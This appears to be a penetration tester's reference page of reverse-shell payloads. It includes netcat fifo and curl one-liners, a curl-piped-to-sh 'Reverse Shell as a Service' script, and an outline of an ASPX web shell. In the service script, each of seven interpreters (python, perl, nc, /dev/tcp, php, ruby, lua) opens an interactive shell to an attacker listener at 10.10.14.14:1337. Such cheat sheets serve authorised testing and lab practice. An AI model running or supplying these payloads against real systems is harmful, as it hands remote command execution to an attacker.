xct's notes
Search…
Shells

Linux Default

1
touch /tmp/x; rm /tmp/x; mkfifo /tmp/x; cat /tmp/x | /bin/sh -i 2>&1 | nc <ip> <port> > /tmp/x
Copied!

Curl Shell

1
{ curl -sNkT . http://$LHOST:$LPORT </dev/fd/3| sh 3>&-;} 3>&1|:
Copied!

Shell.now.sh / Resh.now.sh

Replace IP & Port, then curl this attacker hosted script on the victim and pipe it to bash.
1
# Reverse Shell as a Service
2
# https://github.com/virink/reverse-shell
3
#
4
# 1. On your machine:
5
# nc -l 1337
6
#
7
# 2. On the target machine:
8
# curl https://resh.now.sh/yourip:1337 | sh
9
#
10
# 3. Don't be a dick
11
#
12
# Payload:
13
# curl https://resh.now.sh/10.10.14.14:1337 | sh
14
#
15
16
17
if command -v python > /dev/null 2>&1; then
18
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.14",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
19
exit;
20
fi
21
22
if command -v perl > /dev/null 2>&1; then
23
perl -e 'use Socket;$i="10.10.14.14";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
24
exit;
25
fi
26
27
if command -v nc > /dev/null 2>&1; then
28
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 1337 >/tmp/f
29
exit;
30
fi
31
32
if command -v sh > /dev/null 2>&1; then
33
/bin/sh -i >& /dev/tcp/10.10.14.14/1337 0>&1
34
exit;
35
fi
36
37
if command -v php > /dev/null 2>&1; then
38
php -r '$sock=fsockopen("10.10.14.14",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
39
exit;
40
fi
41
42
if command -v ruby > /dev/null 2>&1; then
43
ruby -rsocket -e'f=TCPSocket.open("10.10.14.14",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
44
exit;
45
fi
46
47
if command -v lua > /dev/null 2>&1; then
48
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.14.14','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');"
49
exit;
50
fi
Copied!

ASPX

1
<%@ Page Language="C#" AutoEventWireup="true" %>
2
<%@ Import Namespace="System.IO" %>
3
<script runat="server">
4
5
... ( C# Code, Shellcode Runner or similar ) ...
6
7
</script>
Copied!
Last modified 11mo ago